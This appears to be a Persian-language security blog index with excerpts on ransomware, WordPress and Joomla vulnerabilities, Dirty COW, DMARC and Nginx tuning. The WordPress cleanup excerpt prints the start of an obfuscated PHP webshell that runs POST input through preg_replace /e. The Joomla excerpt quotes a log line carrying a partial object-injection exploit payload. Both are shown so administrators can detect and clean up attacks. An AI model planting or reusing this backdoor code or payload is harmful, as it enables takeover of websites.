ویروس باجگیر پلیس نما

باج افزارها نوعی از بدافزارها هستند که پس از آلوده کردن و به دست گرفتن کنترل کامپیوتر یا موبایل افراد اقدام به اخاذی از آنها میکنند. عموما باج افزارها برای تحت فشار قراردادن قربانی حتی جلوی استفاده های روزمره از سیستم را میگیرند و یا فایل ها و مستندات ذخیره شده در سیستم را رمزگذاری میکنند تا هیچ فردی به اطلاعات داخل آنها دسترسی نداشته باشد.(تصور کنید که سیستم مسئول مالی شرکت شما به باج افزار آلوده شده باشد! تمام اطلاعات حسابداری شما از دست خواهند رفت!)
اصلاحات امنیتی نسخه جدید وردپرس جهت جلوگیری از حملات تزریق کد

طبق اعلام توسعه دهندگان وردپرس یک مشکل امنیتی در واسط برنامه نویسی REST نسخه های ۴.۷ و ۴.۷.۱ وردپرس وجود دارد که موجب حملات تزریق کد میشود و مهاجمان بسته به پلاگین های سایت، میتوانند کد php را از طریق این آسیب پذیری تزریق کنند، بهمین دلیل نیاز به بروزرسانی وردپرس به نسخه ۴.۷.۲ وجود دارد. Sucuri برای بخشی از پروژه تحقیقاتی آسیب پذیری فایروال WAF شرکت خود در حال بررسی مشکلات امنیتی چندین پروژه متن باز بودند و درحالیکه برروی وردپرس کار می کردند متوجه آسیب پذیری تزریق محتوا که در واسط برنامهنویسی REST وجود داشت، شدند. این آسیب پذیری دسترسی کاربران غیرمجاز برای تغییر محتوا یک پست یا صفحه سایت وردپرس را فراهم می کند. این شرکت پس از کشف این موضوع، مشکل را به تیم امنیتی وردپرس اعلام نمود. در این فاصله بین افشای اصلی توسط Sucuri و ا فشای عمومی این مشکل، ارائه دهندگان هاست وردپرس و فایروال ازجمله Sucuri, SiteLock, CloudFlare و Incapsula از این موضوع مطلع بودند. آکامای(که شرکتی اینترنتی است و در زمینه شبکه تبدیل محتوا فعالیت می کند) هم مطلع شده بود و اعلام کرد با نظارت ترافیک اینترنت برای تلاش های ممکن جهت بهره برداری از این آسیب پذیری تا تاریخ […]
رفع آسیب پذیری احراز اصالت در MongoDB

MongoDB یک دیتابیس متن باز و رایگان و از نوع دیتابیس های NoSQLمی باشد. در اینگونه دیتابیس ها از ساختار سنتی دیتابیس های معمول که بر اساس جداول میباشند، استفاده نمیشود بلکه اطلاعات به شکل اسناد (documents) و به صورت یک زوج از رشته و مقدار (field & value) مانند JSONذخیره میشوند.
بهینه سازی وب سرور Nginx – بخش آخر

اگر به دنبال یافتن وب سروری هستید که با وجود استفاده از منابع سخت افزاری یکسان بتواند سرعت پاسخگویی به درخواست های کاربران سرور شما را افزایش دهد، این مقاله شناخت خوبی نسبت به وب سرور Nginx و امکانات آن به شما خواهد داد. در این مقاله در سه بخش به آموزش دستوراتی که در بهینه سازی وب سرور Nginx به کار می روند می پردازیم. تا در نتیجه بتوانیم بهترین کارایی را در این وب سرور داشته باشیم.
ویروس باجگیر petya را بیشتر بشناسید

بهترین راه مقابله با یک اقدام خرابکارانه آگاهی کافی است. در این مقاله نتیجه تحلیل متخصصین F-Secure بر روی باج افزار Petya را مرور میکنیم.
باج افزار Petya به دلیل ایجاد صفحه آبی مرگ (Bsod) به وسیله بازنویسی توجه کارشناسان امنیت را به خود جلب نموده است.
در حال حاضر کمپانی F-Secure یک پیام هشدار، که اشتراکگذاری نتایج تحلیل و بررسی خود بر روی این باج افزار می باشد را ارائه نموده است.
بهینه سازی وب سرور Nginx – بخش دوم

اگر به دنبال یافتن وب سروری هستید که با وجود استفاده از منابع سخت افزاری یکسان بتواند سرعت پاسخگویی به درخواست های کاربران سرور شما را افزایش دهد، این مقاله شناخت خوبی نسبت به وب سرور Nginx و امکانات آن به شما خواهد داد. در این مقاله در سه بخش به آموزش دستوراتی که در بهینه سازی وب سرور Nginx به کار می روند می پردازیم. تا در نتیجه بتوانیم بهترین کارایی را در این وب سرور داشته باشیم.
بهینه سازی وب سرور Nginx – بخش اول

اگر به دنبال یافتن وب سروری هستید که با وجود استفاده از منابع سخت افزاری یکسان بتواند سرعت پاسخگویی به درخواست های کاربران سرور شما را افزایش دهد، این مقاله شناخت خوبی نسبت به وب سرور Nginx و امکانات آن به شما خواهد داد. در این مقاله در سه بخش به آموزش دستوراتی که در بهینه سازی وب سرور Nginx به کار می روند می پردازیم. تا در نتیجه بتوانیم بهترین کارایی را در این وب سرور داشته باشیم.
ویروس باجگیر تلگرام Telecrypt

Telecrypt یک باج افزار جدید و خرابکار می باشد که با سوء استفاده از سرویس پیام رسان تلگرام فرماندهی و کنترل ارتباطات (C & C) را در دست می گیرد.
متخصصین امنیت آزمایشگاه Kaspersky یک باج افزار جدید به نام تروجان (Telecrypt Ransom.Win32.Telecrypt) را کشف نموده اند که با استفاده از سرویس پیام رسان تلگرام فرماندهی و کنترل ارتباطات (C & C) را در دست می گیرد.
اجبار اتصال https برای ios

استفاده از https در کلیه اپلیکیشنهای Apple تا پایان سال میلادی اجباری خواهد شد و توسعهدهندگان این اپلیکیشنها تا پایان سال لازم است تغییرات لازم را اعمال کنند .
طی یک سخنرانی در کنفرانس امنیتی در سراسر جهان توسعه دهندگان اپل اعلام کردند که آخرین مهلت را اول ژانویه ۲۰۱۷ تعیین نمودند تا برنامههای کاربردی در فروشگاه اپلیکیشنapp store این ویژگی مهم را که امنیت انتقال داده در برنامه ( App Transport Security)یا ATS نامیده می شود فعال کنند.
امنیت و امن سازی وردپرس

مهم ترین قدم در امن کردن وردپرس جلوگیری از راه های نفوذ رایجی می باشد که معمولاً نادیده گرفته میشود.در صورتی که شما مدیر وب سایت وردپرسی هستید حتما باید اقدامات پیشگیرانهی ساده ای که به امنیت وردپرس شما بسیار کمک میکند را انجام دهید. در این مقاله شما با روش های مقاوم کردن وردپرس دربرابر نفوذهای رایج آشنا خواهید شد.
چگونه حفره های امنیتی در یک سایت وردپرسی هک شده را پیدا کنیم؟

کاربران و مدیران زمان زیادی را صرف رفع مشکل نفوذ و هک شدن سایت های وردپرسی میکنند. در بسیاری از موارد در زمانی که ما در حال پاکسازی سایت وردپرسی هستیم، هکر ها همچنان قادر به نفوذ به سایت ما هستند. در این مقاله ما سعی داریم تا روش های پیدا کردن Backdoor ها و جلوگیری و رفع آن را آموزش دهیم.
باج افزارهای رمزگذاری کننده چه هستند؟

باج افزار ها نوعی از برنامه های مخرب هستند که از پیغام های فریبنده (مانند برنده شدن در قرعه کشی) و هشدار دهنده (مانند هشدار پر شدن ایمیل) برای اخاذی کردن استفاده می کنند. عملکرد مخرب باج افزارها و پیغام های آن ها عموما در کامپیوتر و موبایل کاربر، به عنوان مثال با قفل کردن و عدم اجازه استفاده معمولی از دستگاه، اتفاق می افتد و کاربر را تحت فشار قرار داده و اخاذی صورت می گیرد.
اخطار گوگل کروم برای سایت های بدون SSL و HTTPS

با این هدف که کاربران مرور امنی در صفحات وب داشته باشند، گوگل کروم امنیت اتصالات را با یک آیکن در نوار آدرس مشخص می کند. از گذشته تا کنون، کروم اتصالات HTTP را صریحا به عنوان اتصالات ناامن معرفی نکرده است. اما در ابتدای سال ۲۰۱۷ (کروم ۵۶)، کروم صفحات HTTP ای را که از کاربران کلمه عبور یا کارت های اعتباری درخواست کند، به عنوان صفحات نا امن معرفی خواهد کرد. این جزئی از یک برنامه طولانی مدت برای نشانه گذاری تمام وب سایت های HTTP ،به عنوان وب سایت های نا امن است.
جدیدترین باگ امنیتی در Joomla

۳ روز قبل تیم جوملا بسته ای (patch) را برای مقابله با یک آسیب پذیری امنیتی سطح بالا (به نام های CVE-2016-8870 و CVE-2016-8869) منتشر نمود. با استفاده از این آسیب پذیری یک کاربر عادی می تواند پس از ایجاد یک اکانت، دسترسی خود را در سایت افزایش دهد. از اینرو یک فرد مهاجم می تواند با افزایش سطح دسترسی خود، فایل های backdoor را بر روی سرور آپلود نموده و کنترل کامل سایت را به دست بگیرد.
آسیب پذیری Dirty COW در سرور های CentOS

رتاریخ ۲۰۱۶/۱۹/۱۰ آسیب پذیری امنیتی در هسته (kernel) سیستم عامی لینوکس با نام اختصاری dirty COW منتشر شد. این باگ به دلیل وجود مشکل در هنگام مدیریت عملیات copy-on-write توسط هسته COW نام گزاری شده است. در واقع این باگ از سال ۲۰۰۷ و در هسته های ورژن ۲.۶.۲۲ و بالاتر وجود داشته است. خوشبختانه اکثر توزیع های لینوکس بسته های امنیتی جدیدی در آخرین آپدیت های خود برای رفع این باگ ارائه داده اند.
چگونه یک سایت هک شده را پاک سازی کنیم؟

طبق آمار اعلامی سایت Sucuri، در نیمه اول سال ۲۰۱۶، ۷۸ درصد سایت های هک شده از مدیریت محتوی cms استفاده کرده اند.با استفاده از پلاگین Sucuri WordPress Security می توانید سایت وردپرس هک شده را پاک سازی و malware مورد نظر را حذف کنید.
تایید ایمیل بر اساس دامین، گزارش و تطبیق ( DMARC )

تاریخچه ارسال ایمیل های کلاهبرداری به همان ابتدای بوجود آمدن ایمیل برمی گردد. متاسفانه در ساختار پروتکل های ایمیل راهی برای جلوگیری آنها وجود ندارد. در طول سال های گذشته افراد و شرکت های زیادی که در زمینه ی ارسال و دریافت ایمیل فعالیت داشتند برای ایجاد راهکارهایی برای مواجهه با این مسئله کوشیده اند. در طول دهه ی گذشته تکنولوژی هایی نظیر SPF و DKIM برای کسب اطمینان از سالم بودن محتوای ایمیلها ارائه شده اند. حتی با استفاده ی گسترده از آنها روند ایمیل های کلاه برداری و فریبنده، آنچنان کاهش نیافته است.روشن نیست که اگر ایمیلی مطابق با DKIM یا SPF نباشد حتما کلاهبرداری هست یا نه؟
حذف Malware های آپلود شده از طریق shell در وردپرس

اگر شما دارای تعدادی زیادی وبسایت که با وردپرس ایجاده شده اند هستید، بارها ممکن است با این مشکل روبرو شده باشید، بطور کلی بیشتر این هکرهای عزیز به دنبال فولدر هایی می گردند که سطح درستی آنها ۷۷۷ می باشد، که در وردپرس رایج ترین مسیر /wp-content/uploads/ می باشد؛ بنابراین لازم است که به دنبال فایل های آپلود شده در این مسیر بر حسب تاریخ بگردیم، بدین منظور درshell دستور زیر را اجرا کنید : find ./public_html/wp-content/uploads/ -type f -name ‘*.php’ -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort به عنوان نمونه، نتیجه بررسی به صورت زیر می باشد: ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2013/05/blog84.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2014/10/dump.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2014/code.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2015/07/session90.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2015/09/xml96.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2015/504.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/about_us.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/contactus.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/rtbwvcsxrnbsvcd.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/sc_afsed.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/team.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/wp-upload.php می توانید با دستور head خطوط اولیه این فایل ها را جهت بررسی محتوای آن مشاهده نمایید. به عنوان مثال در فایل blog84.php بدین صورت می باشد: head ./wp-content/uploads/2013/05/blog84.php <?php @preg_replace(‘/(.*)/e’, @$_POST[‘dnrdztvetxn’], ”); $GLOBALS[‘af4569’] = “\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5 همانطور که مشاهده می نماید این فایل ها لازم است که سریع حذف شوند. می توانید با دستور rm filename فایل مورد نظر (بعنوان مثال: blog84.php ) […]
آسیب پذیری خط فرمان ریموت در جوملا

تیم امنیتی جوملا پس از کشف حفره امنیتی بسیار مهم خط فرمان ریموت که در تمام نسخه های جوملا از ۱.۵تا ۳.۴ وجود دارد، نسخه جدید جوملا را ارائه نمود. این یک آسیب پذیری جدی است که می تواند به راحتی مورد بهره برداری قرار گیرد و در حال حاضر بسیار خطرناک است. اگر شما از cms جوملا استفاده میکنید لازم است هم اکنون cms را بروز نمایید. اگر شما از نسخه های قدیمی (پشتیبانی نشده) ۱.۵.x و ۲.۵.x استفاده میکنید جهت برطرف سازی اساسی مشکلات از لینک زیر استفاده نمایید. https://goo.gl/Xw5Shb این آسیب پذیری از دو روز اخیر کشف شده و تکرار میکنیم در حال حاضر بسیار خطرناک است. در log زیر می توانید این آسیب پذیری را ملاحظه نمایید: ۲۰۱۵ Dec 12 16:49:07 clienyhidden.access.log Src IP: 74.3.170.33 / CAN / Alberta ۷۴.۳.۱۷۰.۳۳ – – [۱۲/Dec/2015:16:49:40 -0500] “GET /contact/ HTTP/1.1″ ۴۰۳ ۵۳۲۲ “http://google.com/” “}__test|O:21:\x22JDatabaseDriverMysqli\x22:3: .. {s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0: .. {}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:.. {s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:.. اگر شما از جوملا استفاده می نمایید، logهای سایت را فورا بررسی نمایید. درخواست ها از ipهای ۱۴۶.۰.۷۲.۸۳ یا ۷۴.۳.۱۷۰.۳۳ یا ۱۹۴.۲۸.۱۷۴.۱۰۶ را به عنوان اولین ipهای شروع کننده exploit بررسی نمایید. همچنین توصیه می شود در logهای سایت عبارت های JDatabaseDriverMysqli یا O: را جستجو نمایید. در صورتی […]
Exploit و XSS چیست؟ و Zero-Day Vulnerability به چه معناست؟

Exploit چیست؟ نوعی ابزار مانند کد، نرم افزار و … می باشد که از آسیب پذیری ها و حفره های امنیتی شناسایی شده در برنامه های کاربردی، سیستم عامل ها، سخت افزار و … می تواند سوء استفاده نماید. Exploit ممکن است ترکیبی از نتیجه باگ های نرم افزاری، پسوردهای ضعیف، نرم افزار آلوده بوسیله یک کامپیوتر ویروسی یا worm، نرم افزارهای patch نشده ناشی شود. بصورت اساسی Exploit ها به دو نوع شناخته شده و شناخته نشده تقسیم می شوند. Exploit های شناخته شده تاریخچه ای دارند و ما می توانیم اقداماتی را در مقابلشان انجام دهیم. Exploit های شناخته نشده ناشی از آسیب پذیری هایی که هنوز گزارش نشده اند می باشند و این موضوع یک تهدید جدی محسوب می شوند. هکرها اغلب از Exploit ها جهت آلوده کردن تعداد زیادی از سیستم ها استفاده می کنند، در سال های اخیر تهدیدهای بسیاری با استفاده از آسیب پذیری های محصولات جاوا و Adobe مشاهده شده است. این نوع سوء استفاده از سال ۲۰۱۱ گسترده تر شده و میبینیم که چطور هکرها از آسیب پذیری در جاوا و ویندوز ۲۰۰۳ استفاده کردند تا سیستم ها را آلوده کرده و از کاربرها برای ذخیره کردن اطلاعات باجگیری کنند. Exploit ها […]